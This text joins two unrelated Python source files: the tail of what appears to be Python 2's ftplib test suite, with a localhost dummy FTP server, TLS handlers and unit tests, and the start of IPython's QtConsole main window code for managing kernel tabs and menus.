if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
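# Worked example of the reply built above: if the data socket is bound to
# 127.0.0.1 on port 50211, divmod(50211, 256) == (196, 35), so the pushed
# reply is "227 entering passive mode (127,0,0,1,196,35)" (illustrative
# values only).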
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
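# Example of the REST/RETR interaction above: a client that sends "REST 10"
# followed by "RETR <something>" receives RETR_DATA[10:], i.e. the dummy
# payload with its first 10 bytes skipped; self.rest is reset afterwards.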
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
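# Sketch of how this dummy server is driven (mirroring setUp/tearDown in the
# test cases further below); host and port come from the ephemeral bind above:
#
#     server = DummyFTPServer((HOST, 0))
#     server.start()                      # waits until run() sets the Event
#     client = ftplib.FTP(timeout=2)
#     client.connect(server.host, server.port)
#     ...
#     client.close()
#     server.stop()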
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(object, asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error, err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return ''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return ''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
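# Client-side view of the TLS negotiation handled above (a sketch; the server
# variable is assumed to be a running DummyTLS_FTPServer as in the tests below):
#
#     client = ftplib.FTP_TLS(timeout=2)
#     client.connect(server.host, server.port)
#     client.auth()      # AUTH TLS: control channel secured
#     client.prot_p()    # PBSZ 0 + PROT P: data channel secured
#     client.retrlines('LIST')
#     client.prot_c()    # PROT C: back to a clear-text data channel
#     client.quit()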
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', received.append, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = StringIO.StringIO(RETR_DATA)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler.rest, str(r))
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
sock = self.client.transfercmd('list')
self.assertIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
mainwindow.py
|
"""The Qt MainWindow for the QtConsole
This is a tabbed pseudo-terminal of IPython sessions, with a menu bar for
common actions.
Authors:
* Evan Patterson
* Min RK
* Erik Tollerud
* Fernando Perez
* Bussonnier Matthias
* Thomas Kluyver
* Paul Ivanov
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib imports
import json
import re
import sys
import webbrowser
from threading import Thread
# System library imports
from IPython.external.qt import QtGui,QtCore
from IPython.core.magic import magic_escapes
def background(f):
"""call a function in a simple thread, to prevent blocking"""
t = Thread(target=f)
t.start()
return t
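# For example, close_tab() below calls background(kernel_client.stop_channels)
# so that shutting down the channels does not block the Qt event loop.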
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class MainWindow(QtGui.QMainWindow):
#---------------------------------------------------------------------------
# 'object' interface
#---------------------------------------------------------------------------
_magic_menu_dict = {}
def __init__(self, app,
confirm_exit=True,
new_frontend_factory=None, slave_frontend_factory=None,
):
""" Create a tabbed MainWindow for managing IPython FrontendWidgets
Parameters
----------
app : reference to QApplication parent
confirm_exit : bool, optional
Whether we should prompt on close of tabs
new_frontend_factory : callable
A callable that returns a new IPythonWidget instance, attached to
its own running kernel.
slave_frontend_factory : callable
A callable that takes an existing IPythonWidget, and returns a new
IPythonWidget instance, attached to the same kernel.
"""
super(MainWindow, self).__init__()
self._kernel_counter = 0
self._app = app
self.confirm_exit = confirm_exit
self.new_frontend_factory = new_frontend_factory
self.slave_frontend_factory = slave_frontend_factory
self.tab_widget = QtGui.QTabWidget(self)
self.tab_widget.setDocumentMode(True)
self.tab_widget.setTabsClosable(True)
self.tab_widget.tabCloseRequested[int].connect(self.close_tab)
self.setCentralWidget(self.tab_widget)
# hide tab bar at first, since we have no tabs:
self.tab_widget.tabBar().setVisible(False)
# prevent focus in tab bar
self.tab_widget.setFocusPolicy(QtCore.Qt.NoFocus)
def update_tab_bar_visibility(self):
""" update visibility of the tabBar depending of the number of tab
0 or 1 tab, tabBar hidden
2+ tabs, tabBar visible
send a self.close if number of tab ==0
need to be called explicitly, or be connected to tabInserted/tabRemoved
"""
if self.tab_widget.count() <= 1:
self.tab_widget.tabBar().setVisible(False)
else:
self.tab_widget.tabBar().setVisible(True)
if self.tab_widget.count()==0 :
self.close()
@property
def next_kernel_id(self):
"""constantly increasing counter for kernel IDs"""
c = self._kernel_counter
self._kernel_counter += 1
return c
@property
def active_frontend(self):
return self.tab_widget.currentWidget()
def create_tab_with_new_frontend(self):
"""create a new frontend and attach it to a new tab"""
widget = self.new_frontend_factory()
self.add_tab_with_frontend(widget)
def create_tab_with_current_kernel(self):
"""create a new frontend attached to the same kernel as the current tab"""
current_widget = self.tab_widget.currentWidget()
current_widget_index = self.tab_widget.indexOf(current_widget)
current_widget_name = self.tab_widget.tabText(current_widget_index)
widget = self.slave_frontend_factory(current_widget)
if 'slave' in current_widget_name:
# don't keep stacking slaves
name = current_widget_name
else:
name = '(%s) slave' % current_widget_name
self.add_tab_with_frontend(widget,name=name)
def close_tab(self,current_tab):
""" Called when you need to try to close a tab.
It takes the number of the tab to be closed as argument, or a reference
to the widget inside this tab
"""
# let's be sure "tab" and "closing widget" are respectively the index
# of the tab to close and a reference to the frontend to close
if type(current_tab) is not int :
current_tab = self.tab_widget.indexOf(current_tab)
closing_widget=self.tab_widget.widget(current_tab)
# While being closed, the widget might re-send a request to be closed
# again, but it will already be deleted by the time the event is
# processed, so check that the widget still exists and skip if not.
# One example is when 'exit' is sent in a slave tab: 'exit' is re-sent
# by this function on the master widget, which asks all slave widgets
# to exit.
if closing_widget==None:
return
#get a list of all slave widgets on the same kernel.
slave_tabs = self.find_slave_widgets(closing_widget)
keepkernel = None #Use the prompt by default
if hasattr(closing_widget,'_keep_kernel_on_exit'): #set by exit magic
keepkernel = closing_widget._keep_kernel_on_exit
# If the signal was sent by the exit magic (_keep_kernel_on_exit exists
# and is not None), set _hidden to True on the local slave tabs to avoid
# prompting for a kernel restart when they get the signal, and then
# "forward" the 'exit' to the main window.
if keepkernel is not None:
for tab in slave_tabs:
tab._hidden = True
if closing_widget in slave_tabs:
try :
self.find_master_tab(closing_widget).execute('exit')
except AttributeError:
self.log.info("Master already closed or not local, closing only current tab")
self.tab_widget.removeTab(current_tab)
self.update_tab_bar_visibility()
return
kernel_client = closing_widget.kernel_client
kernel_manager = closing_widget.kernel_manager
if keepkernel is None and not closing_widget._confirm_exit:
# don't prompt, just terminate the kernel if we own it
# or leave it alone if we don't
keepkernel = closing_widget._existing
if keepkernel is None: #show prompt
if kernel_client and kernel_client.channels_running:
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if closing_widget._may_close:
msg = "You are closing the tab : "+'"'+self.tab_widget.tabText(current_tab)+'"'
info = "Would you like to quit the Kernel and close all attached Consoles as well?"
justthis = QtGui.QPushButton("&No, just this Tab", self)
justthis.setShortcut('N')
closeall = QtGui.QPushButton("&Yes, close all", self)
closeall.setShortcut('Y')
# allow ctrl-d ctrl-d exit, like in terminal
closeall.setShortcut('Ctrl+D')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(justthis, QtGui.QMessageBox.NoRole)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
if reply == 1: # close All
for slave in slave_tabs:
background(slave.kernel_client.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
closing_widget.execute("exit")
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
elif reply == 0: # close Console
if not closing_widget._existing:
# Have kernel: don't quit, just close the tab
closing_widget.execute("exit True")
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
else:
reply = QtGui.QMessageBox.question(self, title,
"Are you sure you want to close this Console?"+
"\nThe Kernel and other Consoles will remain active.",
okay|cancel,
defaultButton=okay
)
if reply == okay:
self.tab_widget.removeTab(current_tab)
elif keepkernel: #close console but leave kernel running (no prompt)
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
else: #close console and kernel (no prompt)
self.tab_widget.removeTab(current_tab)
if kernel_client and kernel_client.channels_running:
for slave in slave_tabs:
background(slave.kernel_client.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
if kernel_manager:
kernel_manager.shutdown_kernel()
background(kernel_client.stop_channels)
self.update_tab_bar_visibility()
def add_tab_with_frontend(self,frontend,name=None):
""" insert a tab with a given frontend in the tab bar, and give it a name
"""
if not name:
name = 'kernel %i' % self.next_kernel_id
self.tab_widget.addTab(frontend,name)
self.update_tab_bar_visibility()
self.make_frontend_visible(frontend)
frontend.exit_requested.connect(self.close_tab)
def next_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()+1))
def prev_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()-1))
def make_frontend_visible(self,frontend):
widget_index=self.tab_widget.indexOf(frontend)
if widget_index > 0 :
self.tab_widget.setCurrentIndex(widget_index)
def find_master_tab(self,tab,as_list=False):
"""
Try to return the frontend that owns the kernel attached to the given widget/tab.
Only finds frontends owned by the current application. Selection
based on the kernel's port might be inaccurate if several kernels
on different IPs use the same port number.
This function converts between tab index and widget if needed.
Might return None if there is no master widget (non-local kernel).
Will crash IPython if there is more than one master widget.
When as_list is set to True, always returns a list of widget(s) owning
the kernel. The list might be empty or contain several widgets.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_client
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widgets that are candidates to own the kernel share the connection file of the current widget
# and should have a _may_close attribute
filtered_widget_list = [ widget for widget in widget_list if
widget.kernel_client.connection_file == km.connection_file and
hasattr(widget,'_may_close') ]
# the master widget is the one that may close the kernel
master_widget= [ widget for widget in filtered_widget_list if widget._may_close]
if as_list:
return master_widget
assert(len(master_widget)<=1 )
if len(master_widget)==0:
return None
return master_widget[0]
def find_slave_widgets(self,tab):
"""return all the frontends that do not own the kernel attached to the given widget/tab.
Only find frontends owned by the current application. Selection
based on connection file of the kernel.
This function does the conversion tabNumber/widget if needed.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_client
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widgets that are candidates not to own the kernel share the connection file of the current widget
filtered_widget_list = ( widget for widget in widget_list if
widget.kernel_client.connection_file == km.connection_file)
# Get a list of all widgets owning the same kernel and remove them from
# the previous candidates. (better using sets?)
master_widget_list = self.find_master_tab(tab, as_list=True)
slave_list = [widget for widget in filtered_widget_list if widget not in master_widget_list]
return slave_list
# Populate the menu bar with common actions and shortcuts
def add_menu_action(self, menu, action, defer_shortcut=False):
"""Add action to menu as well as self
So that when the menu bar is invisible, its actions are still available.
If defer_shortcut is True, set the shortcut context to widget-only,
where it will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if defer_shortcut:
action.setShortcutContext(QtCore.Qt.WidgetShortcut)
def init_menu_bar(self):
#create menu in the order they should appear in the menu bar
self.init_file_menu()
self.init_edit_menu()
self.init_view_menu()
self.init_kernel_menu()
self.init_magic_menu()
self.init_window_menu()
self.init_help_menu()
def init_file_menu(self):
self.file_menu = self.menuBar().addMenu("&File")
self.new_kernel_tab_act = QtGui.QAction("New Tab with &New kernel",
self,
shortcut="Ctrl+T",
triggered=self.create_tab_with_new_frontend)
self.add_menu_action(self.file_menu, self.new_kernel_tab_act)
self.slave_kernel_tab_act = QtGui.QAction("New Tab with Sa&me kernel",
self,
shortcut="Ctrl+Shift+T",
triggered=self.create_tab_with_current_kernel)
self.add_menu_action(self.file_menu, self.slave_kernel_tab_act)
self.file_menu.addSeparator()
self.close_action=QtGui.QAction("&Close Tab",
self,
shortcut=QtGui.QKeySequence.Close,
triggered=self.close_active_frontend
)
self.add_menu_action(self.file_menu, self.close_action)
self.export_action=QtGui.QAction("&Save to HTML/XHTML",
self,
shortcut=QtGui.QKeySequence.Save,
triggered=self.export_action_active_frontend
)
self.add_menu_action(self.file_menu, self.export_action, True)
self.file_menu.addSeparator()
printkey = QtGui.QKeySequence(QtGui.QKeySequence.Print)
if printkey.matches("Ctrl+P") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
printkey = "Ctrl+Shift+P"
self.print_action = QtGui.QAction("&Print",
self,
shortcut=printkey,
triggered=self.print_action_active_frontend)
self.add_menu_action(self.file_menu, self.print_action, True)
if sys.platform != 'darwin':
# OSX always has Quit in the Application menu, only add it
# to the File menu elsewhere.
self.file_menu.addSeparator()
self.quit_action = QtGui.QAction("&Quit",
self,
shortcut=QtGui.QKeySequence.Quit,
triggered=self.close,
)
self.add_menu_action(self.file_menu, self.quit_action)
def init_edit_menu(self):
self.edit_menu = self.menuBar().addMenu("&Edit")
self.undo_action = QtGui.QAction("&Undo",
self,
shortcut=QtGui.QKeySequence.Undo,
statusTip="Undo last action if possible",
triggered=self.undo_active_frontend
)
self.add_menu_action(self.edit_menu, self.undo_action)
self.redo_action = QtGui.QAction("&Redo",
self,
shortcut=QtGui.QKeySequence.Redo,
statusTip="Redo last action if possible",
triggered=self.redo_active_frontend)
self.add_menu_action(self.edit_menu, self.redo_action)
self.edit_menu.addSeparator()
self.cut_action = QtGui.QAction("&Cut",
self,
shortcut=QtGui.QKeySequence.Cut,
triggered=self.cut_active_frontend
)
self.add_menu_action(self.edit_menu, self.cut_action, True)
self.copy_action = QtGui.QAction("&Copy",
self,
shortcut=QtGui.QKeySequence.Copy,
triggered=self.copy_active_frontend
)
